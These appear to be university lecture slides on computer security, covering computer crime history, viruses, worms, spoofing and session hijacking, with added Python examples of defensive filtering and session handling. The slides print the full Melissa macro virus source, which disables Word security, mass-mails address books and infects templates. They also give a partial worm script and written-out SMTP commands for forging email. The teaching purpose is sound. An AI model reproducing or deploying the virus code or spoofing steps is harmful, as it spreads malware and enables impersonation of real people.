Computer Security
GSBA (Zurich) MIS Block: Hacking
Sanjay Goel, School of Business, University at Albany

  • Crisis
  • Computer Crimes
  • Hacker Attacks
  • Modes of Computer Security
  • Password Security
  • Network Security
  • Web Security
  • Distributed Systems Security
  • Database Security

Crisis
  • The Internet has grown very fast and security has
    lagged behind.
  • Legions of hackers have emerged because the barrier
    to entering the hacker club is low.
  • It is hard to trace the perpetrator of cyber attacks,
    since real identities are camouflaged.
  • It is very hard to track people down because of the
    ubiquity of the network.
  • Large-scale failures of the Internet can have a
    catastrophic impact on an economy that relies
    heavily on electronic transactions.

Computer Crime: The Beginning
  • In 1988 a "worm program" written by a college
    student (the Morris worm) shut down about 10 percent
    of the computers connected to the Internet. This was
    the beginning of the era of cyber attacks.
  • Today we have about 10,000 incidents of cyber
    attacks which are reported and the number is

Computer Crime - 1994
  • A 16-year-old music student called Richard Pryce,
    better known by the hacker alias Datastream
    Cowboy, is arrested and charged with breaking
    into hundreds of computers including those at
    Griffiss Air Force Base, NASA and the Korean
    Atomic Research Institute. His online mentor,
    "Kuji", is never found.
  • Also this year, a group directed by Russian
    hackers broke into the computers of Citibank and
    transferred more than $10 million from customers'
    accounts. Eventually, Citibank recovered all but
    $400,000 of the pilfered money.

Computer Crime - 1995
  • In February, Kevin Mitnick is arrested for a
    second time. He is charged with stealing 20,000
    credit card numbers. He eventually spends four
    years in jail and on his release his parole
    conditions demand that he avoid contact with
    computers and mobile phones.
  • On November 15, Christopher Pile becomes the
    first person to be jailed for writing and
    distributing a computer virus. Mr Pile, who
    called himself the Black Baron, was sentenced to
    18 months in jail.
  • The US General Accounting Office reveals that US
    Defense Department computers sustained 250,000
    attacks in 1995.

Computer Crime - 1999
  • In March, the Melissa virus goes on the rampage
    and wreaks havoc with computers worldwide. After
    a short investigation, the FBI tracks down and
    arrests the writer of the virus, a 29-year-old
    New Jersey computer programmer, David L. Smith.
  • More than 90 percent of large corporations and
    government agencies were the victims of computer
    security breaches in 1999

Computer Crime - 2000
  • In February, some of the most popular websites in
    the world such as Amazon and Yahoo are almost
    overwhelmed by being flooded with bogus requests
    for data.
  • In May, the ILOVEYOU virus is unleashed and clogs
    computers worldwide. Over the coming months,
    variants of the virus are released that manage to
    catch out companies that didn't do enough to
    protect themselves.
  • In October, Microsoft admits that its corporate
    network has been hacked and source code for
    future Windows products has been seen.

Computer Crime - 2002
  • In April 2002, computer hackers calling
    themselves Deceptive Duo announced that they
    had begun their mission of breaking into computer
    systems to call attention to the vulnerabilities
    in the US National Security
  • In subsequent weeks they hacked into 52 web sites
    and databases including those operated by the US
    Office of the Secretary of Defense, the Space and
    Naval Warfare Systems Command, the Defense
    Logistics Agency, Sandia National Lab, NASA JPL,
    airlines and banks.

Intrusion Incident Reports
(Chart of intrusion incident reports per year; note: the last year is projected from 3 quarters of data.)
Why are we vulnerable?
  • Increased complexity of the systems
  • Large networks with switches, hubs, gateways
    provide multiple entry points
  • Very sophisticated software using millions of
    lines of code which leave holes for hackers to
  • Constantly upgrading computer systems and
  • Support staff not able to keep up with security
  • New technology (often not fully tested) adds new
  • Lack of proper education
  • Managers do not realize the vulnerabilities and
    are not willing to invest in technology that does
    not directly affect the bottom line
  • Dependence on commercial software with known
  • e.g. Microsoft Windows OS and Outlook

Viruses
  • Computer viruses are self-replicating software
    entities that attach themselves parasitically to
    existing programs.
  • The virus spreads by creating replicas of itself
    and attaching them to other executable programs
    to which it has write access.
  • A true virus does not spread from machine to
    machine on its own. It must be passed on to other
    users via e-mail, infected files/diskettes,
    programs or shared files.
  • Viruses normally consist of two parts:
    • Replicator: responsible for copying the virus to
      other executable programs.
    • Payload: the action of the virus, which may be benign,
      such as printing a weird message or playing music,
      or malicious, such as destroying data or
      corrupting the hard disk.

  • When a user executes an infected program (an
    executable file or boot sector), the viral
    portion of the code typically executes first and
    then control returns to the original program,
    which executes normally.
  • Unless the virus executes a payload that the
    user observes, the user is not likely to notice the
    virus operating on his/her hard drive.
  • Viruses can persist in your programs for a long
    time without being detected, so constantly
    updating your virus signatures and running virus
    scans is very important.

  • Polymorphic viruses
    • Viruses which modify themselves prior to
      attaching themselves to another program.
    • These are hard to detect since they are
      constantly changing their signature.
  • Macro viruses
    • These viruses use an application macro language
      (such as VBA, Visual Basic for Applications) to create
      programs that infect documents and templates.
    • If an infected document is opened the virus is
      executed and it infects the user's application
      (Melissa, below, copies itself into Word's Normal template).

Melissa Virus Source Code
    Private Sub Document_Open()
    On Error Resume Next
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
        CommandBars("Macro").Controls("Security...").Enabled = False
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    Else
        CommandBars("Tools").Controls("Macro").Enabled = False
        Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
    End If

    Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
    Set UngaDasOutlook = CreateObject("Outlook.Application")
    Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
        If UngaDasOutlook = "Outlook" Then
            DasMapiName.Logon "profile", "password"
            For y = 1 To DasMapiName.AddressLists.Count
                Set AddyBook = DasMapiName.AddressLists(y)
                x = 1
                Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
                For oo = 1 To AddyBook.AddressEntries.Count
                    Peep = AddyBook.AddressEntries(x)
                    BreakUmOffASlice.Recipients.Add Peep
                    x = x + 1
                    If x > 50 Then oo = AddyBook.AddressEntries.Count
                Next oo
                BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
                BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
                BreakUmOffASlice.Send
                Peep = ""
            Next y
            DasMapiName.Logoff
        End If
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
    End If

    Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
    Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
    NTCL = NTI1.CodeModule.CountOfLines
    ADCL = ADI1.CodeModule.CountOfLines
    BGN = 2
    If ADI1.Name <> "Melissa" Then
        If ADCL > 0 Then _
        ADI1.CodeModule.DeleteLines 1, ADCL
        Set ToInfect = ADI1
        ADI1.Name = "Melissa"
        DoAD = True
    End If

    If NTI1.Name <> "Melissa" Then
        If NTCL > 0 Then _
        NTI1.CodeModule.DeleteLines 1, NTCL
        Set ToInfect = NTI1
        NTI1.Name = "Melissa"
        DoNT = True
    End If

    If DoNT <> True And DoAD <> True Then GoTo CYA

    If DoNT = True Then
        Do While ADI1.CodeModule.Lines(1, 1) = ""
            ADI1.CodeModule.DeleteLines 1
        Loop
        ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
        Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
            ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
            BGN = BGN + 1
        Loop
    End If

    If DoAD = True Then
        Do While NTI1.CodeModule.Lines(1, 1) = ""
            NTI1.CodeModule.DeleteLines 1
        Loop
        ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
        Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
            ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
            BGN = BGN + 1
        Loop
    End If

    CYA:
    If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
        ActiveDocument.Saved = True
    End If

    'WORD/Melissa written by Kwyjibo
    'Works in both Word 2000 and Word 97
    'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
    'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

    If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
    End Sub
Worms
  • Worms are a form of self-replicating program
    that can spread automatically.
  • Unlike viruses they do not need a carrier
    program; they replicate by spawning copies of
    themselves.
  • They are more complex and much harder to
    write than virus programs.
  • The ILOVEYOU worm in 2000 automatically emailed
    itself to the first 200 entries in the Outlook
    address book.
  • The worm spread to 10 million computers in the two
    days it took to create a patch for it.
  • It cost billions of dollars to repair the damage.
  • Sometimes worms take a long time to spread:
    the Anna Kournikova worm was discovered in August
    2000 and became a serious threat in February 2001.
  • Code Red, Nimda and SirCam are other worms, each of
    which cost upwards of 500 million dollars in damages.

Worm (Anna Kournikova)
    'Vbs.OnTheFly Created By OnTheFly
    On Error Resume Next
    Set WScriptShell = CreateObject("WScript.Shell")
    WScriptShell.regwrite "HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b"
    Set FileSystemObject = Createobject("scripting.filesystemobject")
    FileSystemObject.copyfile wscript.scriptfullname, F...
    if WScriptShell.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
        doMail()
    end if
    if month(now) = 1 and day(now) = 26 then
        WScriptShell.run "Http://...", 3, false
    end if
    Set thisScript = FileSystemObject.opentextfile(wscript.scriptfullname, 1)
    thisScriptText = thisScript.readall

Trojan Horse
  • A program that is secretly installed on a
    computer, planting a hidden payload that allows
    the hacker who planted it to do things such as
    stealing passwords or recording keystrokes and
    transmitting them to a third party.
  • A logic bomb is a trojan horse that executes when
    certain conditions become true.
  • Most commonly it executes at a specific date and
    time.
  • Example: the Cute trojan horse allows hackers to
    disable the firewalls installed on computers.

Why do Hackers Attack?
  • Most hackers try to test the system limitations
    out of intellectual curiosity or for bragging rights
  • Cyber criminals hack into corporate computers to
    steal money or credit card numbers
    • In March 2001 the FBI reported that over 1 million
      credit card numbers were stolen by cyber
      criminals in Russia and Ukraine
  • Cyber terrorists try to push their political
    agenda by coercion via computer-based attacks
    against computers and networks
    • NATO computers were blasted with infected emails
      to protest against the bombings in Kosovo during the
      1999 conflict
    • Lucent was made the target of DoS attacks by a group
      protesting against its business with Israel
  • Disgruntled employees often vent anger at a
    company or organization by hacking, stealing
    information or causing damage to computer systems

Types of Hacker Attack
  • Active Attacks
    • Denial of Service
    • Breaking into a site
      • Intelligence Gathering
      • Resource Usage
      • Deception
  • Passive Attacks
    • Sniffing
      • Passwords
      • Network Traffic
      • Sensitive Information
    • Information Gathering

Modes of Hacker Attack
  • Spoofing
  • Session Hijacking
  • Denial of Service Attacks
  • Buffer Overflow Attacks
  • Password Attacks

Spoofing
  • Definition
    • An attacker alters his identity so that someone
      thinks he is someone else
    • Email, User ID, IP Address
    • Attacker exploits the trust relation between a user and
      networked machines to gain access to the machines
  • Types of Spoofing
    • IP Spoofing
    • Email Spoofing
    • Web Spoofing

IP Spoofing
  • There are three basic flavors of IP spoofing
  • Basic Address Change
  • Use of source routing to intercept packets
  • Exploiting of a trust relationship on UNIX

IP Spoofing Basic Address Change
  • Definition
  • Attacker uses IP address of another computer to
    acquire information or gain access

(Diagram: the attacker sends packets with the spoofed machine's address in the From field; replies go back to the spoofed address, not to the attacker.)
  • Attacker changes his own IP address to the spoofed
    address
  • Attacker can send messages to a machine
    masquerading as the spoofed machine
  • Attacker can not receive the replies, which go to
    the spoofed machine
Basic Address Change (Windows)
  • Simple mechanism
  • From the Start menu select Settings > Control Panel
  • Double click on the Network icon
  • Right click the LAN connection and select Properties
  • Select Internet Protocol (TCP/IP) and click on Properties
  • Change the IP address to the address you want to spoof
  • Reboot the machine
  • All packets sent from the machine now have the
    spoofed address

Basic Address Change (Unix)
  • Use the ifconfig command to set the interface's address
    (requires root)

IP-Spoofing (Basic Address Change)
  • Limitation
    • Flying blind attack, i.e. the attacker can not get return
      traffic
    • Any protocol which requires a 3-way handshake (TCP) can
      not be used
    • UDP, which is connectionless, can be used to send
      spoofed packets
  • Uses
    • Used in denial-of-service attacks where a single
      packet can crash a machine

IP Spoofing Basic Address Change
  • Prevention
    • You can protect your machines from being used to
      launch a spoofing attack
    • You can do little to prevent other people from
      spoofing your address
    • Users can be prevented from having access to
      network configuration
    • To protect your company from spoofing attacks you
      can apply basic filters at your routers
      • Ingress filtering: prevents packets from outside
        coming in with an address from inside.
      • Egress filtering: prevents packets not having an
        internal address from leaving the network.
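The two router filters above, as an added example that is not part of the original slides: a Python model of a border router's ingress and egress decision, run over a few constructed packets. The internal prefix 203.0.113.0/24, the bogon list and the sample packets are assumptions made for the example; a real router expresses the same two rules as access-list entries on its Internet-facing interface.

```python
import ipaddress

# Assumed (hypothetical) address plan: the company's own prefix. 203.0.113.0/24
# is a documentation range, chosen so the example never names a real network.
INTERNAL_NET = ipaddress.ip_network("203.0.113.0/24")

# Source prefixes that can never legitimately arrive from the Internet:
# RFC 1918 private space, loopback and link-local.
BOGON_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("169.254.0.0/16"),
]


def border_filter(packet):
    """Return (allowed, reason) for one packet crossing the border router.

    packet: dict with 'src', 'dst' (dotted IPv4 strings) and 'direction',
    where 'in' means arriving from the Internet and 'out' means leaving.
    Ingress rule: an outside packet must not claim an inside (or bogon) source.
    Egress rule: a packet leaving must carry an inside source, so a compromised
    internal host cannot be used to launch spoofed packets at other networks.
    """
    src = ipaddress.ip_address(packet["src"])
    if packet["direction"] == "in":
        if src in INTERNAL_NET:
            return False, "ingress: outside packet claims an internal source"
        if any(src in net for net in BOGON_NETS):
            return False, "ingress: private/bogon source from outside"
        return True, "ingress: ok"
    if packet["direction"] == "out":
        if src not in INTERNAL_NET:
            return False, "egress: leaving packet has a non-internal source"
        return True, "egress: ok"
    raise ValueError("direction must be 'in' or 'out'")


# Constructed sample traffic: a normal inbound reply, an inbound packet spoofing
# our own mail server's address, an inbound packet with a private source, a normal
# outbound request, and an outbound packet from an internal host spoofing an
# outside victim (the single-packet, flying-blind DoS case on this slide).
SAMPLE_PACKETS = [
    {"src": "198.51.100.7",  "dst": "203.0.113.25", "direction": "in"},
    {"src": "203.0.113.25",  "dst": "203.0.113.10", "direction": "in"},
    {"src": "10.1.2.3",      "dst": "203.0.113.10", "direction": "in"},
    {"src": "203.0.113.44",  "dst": "198.51.100.7", "direction": "out"},
    {"src": "198.51.100.99", "dst": "192.0.2.1",    "direction": "out"},
]


def apply_filters(packets=SAMPLE_PACKETS):
    """Run every packet through the border filter; returns a list of (allowed, reason)."""
    return [border_filter(p) for p in packets]


if __name__ == "__main__":
    for p, (ok, why) in zip(SAMPLE_PACKETS, apply_filters()):
        verdict = "PASS" if ok else "DROP"
        print(f"{p['direction']:>3} {p['src']:>15} -> {p['dst']:<15} {verdict}  ({why})")
```

Only the second packet needs the internal prefix to be caught; the others are rejected by the generic bogon and egress rules, which is why both filters are needed even at a site that cannot stop others from spoofing its addresses elsewhere.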

IP Spoofing Source Routing
  • Definition
  • Attacker spoofs the address of another machine
    and inserts itself between the attacked machine
    and the spoofed machine to intercept replies

(Diagram: the attacker, placed on the route by source routing, intercepts the packets addressed to the spoofed machine; replies sent back to the spoofed address pass through the attacker.)
  • The path a packet takes can vary over time

IP Spoofing Source Routing Contd.
  • Attacker uses source routing to ensure that the
    packets pass through certain nodes on the network
  • Loose Source Routing (LSR) The sender specifies
    a list of addresses that the packet must go
    through but it can go to any other address if it
    needs to.
  • Strict Source Routing (SSR) The sender specifies
    the exact path for the packet and the packet is
    dropped if the exact path can not be taken.
  • Source routing works by using a 39-byte source
    route option field in the IP header
  • Works by picking one node address at a time
  • A maximum of 9 nodes in the path can be specified
  • Source routing was introduced into the IP spec
    for debugging and for testing redundancy in the
IP Spoofing Source Routing contd.
  • tracert: Windows NT utility, run at a command prompt
  • Traces a path from your machine to the host name or IP
    address given along with the tracert command.
  • Usage
      tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
  • Options
      -d               Do not resolve addresses to host names.
      -h maximum_hops  Maximum number of hops to search for the target.
      -j host-list     Loose source route along host-list.
      -w timeout       Wait timeout milliseconds for each reply.
  • Tracing a host name: tracert <host name>
      Output begins "Tracing route to ... over a maximum of 30 hops", then
      one line per hop with three round-trip times (e.g. 181 ms 160 ms 170 ms).

IP Spoofing Source Routing contd.
  • Tracing an IP address: tracert <ip-address>
  • Tracing using loose source routing: tracert -j <host-list> <target>
  • Protection
    • Disable source routing at your routers
IP Spoofing Trust Relationships
  • In UNIX trust relationships can be set up between
    multiple machines
  • After trust is established the user can use the
    Unix r commands (rlogin, rsh, rcp) to access resources on
    the other machines
  • A .rhosts file is set up on individual machines,
    or /etc/hosts.equiv is used to set it up at the
    system level
  • Trust relationships are easy to spoof
  • If the attacker realizes that a machine trusts an IP
    address, he can spoof that address and
    he is allowed access without a password
  • The responses go back to the spoofed machine, so
    this is still a flying blind attack.
  • Protection
    • Do not use trust relationships
    • Do not allow trust relationships over the Internet
      and limit them within the company
    • Monitor which machines and users can have trust
      without jeopardizing critical data or function

Email Spoofing
  • Definition
    • Attacker sends messages masquerading as someone else
    • What can be the repercussions?
  • Reasons
    • Attackers want to hide their identity while
      sending messages (sending anonymous emails)
      • User sends email to an anonymous remailer which
        sends the email on to the intended recipient
    • Attacker wants to impersonate someone
      • To get someone in trouble
      • Social engineering: get information by pretending
        to be someone else

Email Spoofing Similar Name Account
  • Create an account with a similar email address
  • A message from this account
    can perplex the students
  • Most mailers have an alias (display name) field; this can be
    used to prescribe any name.
  • Example
      Class,
      I am too sick to come to the class tomorrow so
      the class is cancelled.
      The assignments that were due are now due next
      Sanjay Goel

Email Spoofing Similar Name Account
  • Protection
  • Educating the employees in a corporation to be
  • Make sure that the full email address rather than
    alias is displayed
  • Institute policy that all official communication
    be done using company email
  • Use PKI where digital signature of each employee
    is associated with the email

Email Spoofing Mail Client
  • Modify a mail client
  • When email is sent from the user no
    authentication is performed on the from address
  • Attacker can put in any return address he wants
    to in the mail he sends
  • Protection
  • Education
  • Audit Logging
  • Looking at the full email address

Email Spoofing Telnet to Port 25
  • Telnet to port 25
    • Most mail servers use port 25 for SMTP.
    • An attacker runs a port scan and gets the IP
      address of a machine with port 25 open
    • telnet ip-address 25 (command to telnet to port 25)
    • Attacker logs on to this port and composes a
      message for the user.
  • Example (the attacker types the SMTP commands by hand;
    the server does not check the MAIL FROM address)
      HELO attacker-host
      MAIL FROM: <spoofed-email-address>
      RCPT TO: <person-sending-mail-to>
      DATA
      (message you want to send)
      .      (a period alone on a line ends the message)

Email Spoofing Telnet to Port 25
  • Mail relaying is a mail server accepting a message from
    an outside sender for delivery to a recipient on a
    different domain, one the server is not responsible for
  • Protection
    • Make sure that the recipient's domain is the same
      as the mail server's own domain before accepting a
      message from a remote connection
    • Newer SMTP servers disallow mail relaying by default
    • From a remote connection, the from and to
      addresses must be in the same domain as the mail server
    • Make sure that spoofing and relay filters are enabled
Web Spoofing
  • Basic
  • Man-in-the-Middle Attack
  • URL Rewriting
  • Tracking State

Web Spoofing - Basic
  • There is no requirement against registering a domain
  • Attacker registers a web address matching (or closely
    resembling) an entity's name
  • Process
    • Hacker sets up a spoofed site
    • User goes to the spoofed site
    • Clicks on items to order and checks out
    • Site prompts the user for credit card information
    • Gives the user a cookie
    • Puts up a message: "Site experiencing technical
      difficulties"
    • When the user tries back, the spoofed site checks the cookie
    • It already has the credit card number, so it directs the
      user to the legitimate site

Web Spoofing - Basic
  • Protection
    • Use server side certificates
    • Certificates are much harder to spoof
    • Users need to ensure that the certificates are
      legitimate before clicking on OK to accept them

Web Spoofing Man in the Middle Attack
  • Man-in-the-Middle Attack
  • Attacker acts as a proxy between the web server
    and the client
  • Attacker has to compromise the router or a node
    through which the relevant traffic flows
  • Protection
  • Secure the perimeter to prevent compromise of

Web Spoofing URL Rewriting
  • URL Rewriting
    • Attacker redirects web traffic to another site
      that is controlled by the attacker
    • Attacker writes his own web site address before
      the legitimate link
    • e.g. <A href="http://...">
    • The user is first directed to the hacker's site and
      then redirected to the actual site
  • Protections
    • Web browsers should be configured to always show
      the complete address
    • Ensure that the code for the web sites is
      properly protected at the server end and during

Web Spoofing
  • Tracking State
  • When a user logs on to a site a persistent
    authentication is maintained
  • This authentication can be stolen for
    masquerading as the user

Tracking State
  • Browsers primarily use the HTTP protocol to
  • HTTP is a stateless protocol
  • Web Sites need to maintain persistent
    authentication so that user does not have to
    authenticate repeatedly
  • This authentication can be stolen for
    masquerading as the user

Web Spoofing Tracking State
  • Three types of tracking methods are used
    • Cookies: a line of text with an ID in the user's cookie
      file
      • Attacker can read the ID from the user's cookie file
    • URL Session Tracking: an id is appended to all
      the links in the website's web pages.
      • Attacker can guess or read this id and masquerade
        as the user
    • Hidden Form Elements
      • ID is hidden in form elements which are not
        visible to the user
      • Hacker can modify these to masquerade as another
        user

Web Spoofing Tracking State Cookies
  • Cookies are pieces of information that the
    server passes to the browser and the browser
    stores on the client, sending them back with
    later requests to that server
  • Set of name-value pairs
  • Web servers place cookies on user machines with an
    id to track the users
  • Two types of cookies
    • Persistent cookies: stored on the hard drive in a text
      file, with an expiry date
    • Non-persistent cookies: stored in memory and discarded
      when the browser is closed
  • Attacker gets cookies by
    • Accessing the victim's hard drive
    • Guessing the ids which different web servers assign

Web Spoofing Tracking State Cookies
  • Protection
  • Physical protection of hard drives is best
  • Use non-persistent cookies since hacker has to
    access and edit memory to get to it.
  • Use random, hard to guess ID

Web Spoofing Tracking State URL Encoding
  • http://www.address.edu:1234/path/subdir/file.ext?query_string
    • Service: http
    • Host: www.address.edu
    • Port: 1234
    • /path/subdir/file.ext: resource path on the server
    • query_string: additional information that can
      be passed to the resource
  • HTTP allows name-value pairs to be passed to the resource
    • http://www.test.edu/index.jsp?firstname=sanjay
  • The server can place the id of a customer along
    with the URL
    • http://... (the id travels in the query string)
  • This number can be obtained by guessing or
    looking over someone's shoulder
  • Timeout for the sessions may be a few hours
  • User can masquerade as the owner of the id and
    transact on the web

Web Spoofing URL Encoding Protection
  • Server Side
  • Use large, hard to guess identifiers
  • Keep the session inactivity time low
  • User Side
  • Make sure that no one is looking over your
    shoulder as you browse
  • Do not leave terminals unattended
  • Use server side certificates
  • A server side certificate is a certificate that
    the server presents to a client to prove identity
  • Users should verify the certificates prior to
    clicking OK on the accept button

Web Spoofing Tracking State Hidden Form Fields
  • HTML allows the creation of hidden fields in a form
  • Developers exploit this to store information for
    their reference
  • ID can be stored as a hidden form field
    • <Input Type=Hidden Name=Search Value=key>
    • <Input Type=Hidden Name=id Value=123429823>
  • Protection
    • Hard to guess ids
    • Short expiry times
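The three tracking methods and their protections (large hard-to-guess ids, short timeouts, non-persistent cookies), as an added example that is not part of the original slides: a Python session store that contrasts a sequential id like the slide's 123429823 with one drawn from the operating system's random source, enforces idle and absolute timeouts, and emits the Set-Cookie line with the attributes a session cookie should carry. The timeout values, user names and the "neighbour guessing" attacker are assumptions made for the example; the store applies equally whether the id travels in a cookie, a URL or a hidden field.

```python
import itertools
import secrets

IDLE_TIMEOUT = 15 * 60          # assumed policy: 15 idle minutes end the session
ABSOLUTE_LIFETIME = 8 * 3600    # assumed policy: hard cap even for an active session

_next_id = itertools.count(123429823)   # starts at the slide's sample id


def weak_session_id():
    """Sequential id, as on the slide: seeing one id tells you its neighbours."""
    return str(next(_next_id))


def strong_session_id():
    """128 bits from the OS CSPRNG (secrets): no pattern to guess from."""
    return secrets.token_urlsafe(16)


class SessionStore:
    """Server-side session table. The browser only ever holds the opaque id;
    the user identity and timestamps stay on the server."""

    def __init__(self, id_func=strong_session_id):
        self._new_id = id_func
        self._sessions = {}

    def create(self, user, now):
        sid = self._new_id()
        self._sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def lookup(self, sid, now):
        """Return the user bound to sid, or None if it is unknown or has expired."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        if now - s["last_seen"] > IDLE_TIMEOUT or now - s["created"] > ABSOLUTE_LIFETIME:
            del self._sessions[sid]          # expired: forget it, treat as unknown
            return None
        s["last_seen"] = now
        return s["user"]


def guess_neighbours(store, observed_sid, now, radius=100):
    """The slide's guessing attacker: having seen one id (over a shoulder, or in a URL),
    try the ids numerically around it. Returns the users whose sessions were taken over."""
    try:
        base = int(observed_sid)
    except ValueError:
        return []        # opaque token: there is no numeric neighbourhood to walk
    hits = []
    for delta in range(-radius, radius + 1):
        if delta == 0:
            continue
        user = store.lookup(str(base + delta), now)
        if user is not None:
            hits.append(user)
    return hits


def session_cookie(sid):
    """Set-Cookie line for the id: no Expires/Max-Age (non-persistent, memory only),
    Secure (HTTPS only), HttpOnly (not readable by page scripts), SameSite."""
    return f"Set-Cookie: SID={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


def demo():
    """Two stores, one per id scheme; the attacker observes Bob's id in each."""
    t0 = 1_700_000_000
    weak = SessionStore(weak_session_id)
    weak.create("alice", t0)
    bobs_weak_sid = weak.create("bob", t0)
    strong = SessionStore(strong_session_id)
    strong.create("alice", t0)
    bobs_strong_sid = strong.create("bob", t0)
    return {
        "weak_guess_hits": guess_neighbours(weak, bobs_weak_sid, t0),
        "strong_guess_hits": guess_neighbours(strong, bobs_strong_sid, t0),
        "after_idle": strong.lookup(bobs_strong_sid, t0 + IDLE_TIMEOUT + 1),
        "cookie": session_cookie(bobs_strong_sid),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With sequential ids the attacker who saw Bob's id walks straight into Alice's session; with the random id the same attacker gets nothing, and Bob's own id stops working once the idle timeout has passed.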

Web Spoofing General Protection
  • Disable JavaScript, ActiveX and other scripting
    languages that execute locally or in the browser
  • Make sure that the browsers location line is
    always visible
  • Educate the users
  • Make hard to guess session ids
  • Use server side certificates
  • A server side certificate is a certificate that
    the server presents to a client to prove identity
  • Users should verify the certificates prior to
    clicking OK on the accept button

Session Hijacking
  • Definition
    • Process of taking over an existing active session
  • Modus Operandi
    • User makes a connection to the server by
      authenticating using his user ID and password.
    • After the users authenticate, they have access to
      the server as long as the session lasts.
    • Hacker takes the user offline by denial of service
    • Hacker gains access to the server by impersonating
      the user

Session Hijacking
(Diagram: Bob telnets to the server and authenticates; the attacker, watching the session, then sends "Hi! I am Bob".)
  • Attacker can
    • monitor the session
    • periodically inject commands into the session
    • launch passive and active attacks from the session

Session Hijacking How Does it Work?
  • Attackers exploit sequence numbers to hijack sessions
  • Sequence numbers are 32-bit counters used to
    • tell receiving machines the correct order of packets
    • tell the sender which packets were received and which
      were lost
  • Receiver and sender each have their own sequence number
  • When two parties communicate the following are needed
    • IP addresses
    • Port numbers
    • Sequence numbers
  • IP addresses and port numbers are easily
    available, so once the attacker gets the server to
    accept his guessed sequence numbers he can hijack
    the session.
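The sequence-number mechanism above, as an added example that is not part of the original slides: a simplified Python model of the server end of Bob's telnet connection, which accepts a segment only when its IP addresses, ports and sequence number all match. It shows the on-path attacker's injection after sniffing one of Bob's packets, why Bob's own next packet is then rejected (the session is desynchronized), and contrasts a predictable with a random initial sequence number for the blind, off-path case. Addresses, ports and the injected command are constructed; TCP windows, ACKs and flags are omitted.

```python
import secrets
from dataclasses import dataclass


@dataclass
class Segment:
    """The fields of a TCP segment that matter for hijacking."""
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    seq: int
    payload: bytes


class TelnetServerConn:
    """Server end of one established connection, simplified: a segment is accepted only
    if its 4-tuple matches the connection and its seq is exactly the next byte expected."""

    def __init__(self, client_ip, client_port, server_ip, server_port, first_seq):
        self.client = (client_ip, client_port)
        self.server = (server_ip, server_port)
        self.expected_seq = first_seq
        self.executed = []                 # commands the server has run, in order

    def receive(self, seg):
        if (seg.src_ip, seg.src_port) != self.client or (seg.dst_ip, seg.dst_port) != self.server:
            return "dropped: not this connection"
        if seg.seq != self.expected_seq:
            return "dropped: out of sequence"
        self.expected_seq = (self.expected_seq + len(seg.payload)) % 2**32
        self.executed.append(seg.payload)
        return "accepted"


BOB = ("10.0.0.5", 40000)      # constructed client address and ephemeral port
SERVER = ("10.0.0.1", 23)      # constructed telnet server


def predictable_isn(uptime_seconds):
    """Old-style initial sequence number: a clock advancing 64000 per second, so anyone
    who knows roughly how long the host has been up can compute it."""
    return (64000 * uptime_seconds) % 2**32


def random_isn(_uptime_seconds):
    """Modern behaviour: 32 random bits from the OS CSPRNG (uptime is irrelevant)."""
    return secrets.randbits(32)


def sniffing_hijack(first_seq=5000):
    """Attacker on Bob's LAN sniffs Bob's packet, so IPs, ports and the next seq are known.
    He injects a command; Bob's own next packet then no longer fits the server's state."""
    conn = TelnetServerConn(*BOB, *SERVER, first_seq)
    bob_cmd = b"ls\n"
    conn.receive(Segment(*BOB, *SERVER, first_seq, bob_cmd))          # sniffed by attacker
    injected = Segment(*BOB, *SERVER, first_seq + len(bob_cmd), b"id > /tmp/hijacked\n")
    result_attacker = conn.receive(injected)
    bobs_next = Segment(*BOB, *SERVER, first_seq + len(bob_cmd), b"cat notes.txt\n")
    result_bob = conn.receive(bobs_next)
    return result_attacker, result_bob, conn.executed


def blind_injection(isn_func, uptime_seconds=1200):
    """Off-path attacker cannot sniff, so he must guess the sequence number from the
    host's uptime; that only works when the server hands out predictable ISNs."""
    conn = TelnetServerConn(*BOB, *SERVER, isn_func(uptime_seconds))
    guess = predictable_isn(uptime_seconds)
    return conn.receive(Segment(*BOB, *SERVER, guess, b"id > /tmp/hijacked\n"))


if __name__ == "__main__":
    print(sniffing_hijack())
    print("predictable ISN, blind:", blind_injection(predictable_isn))
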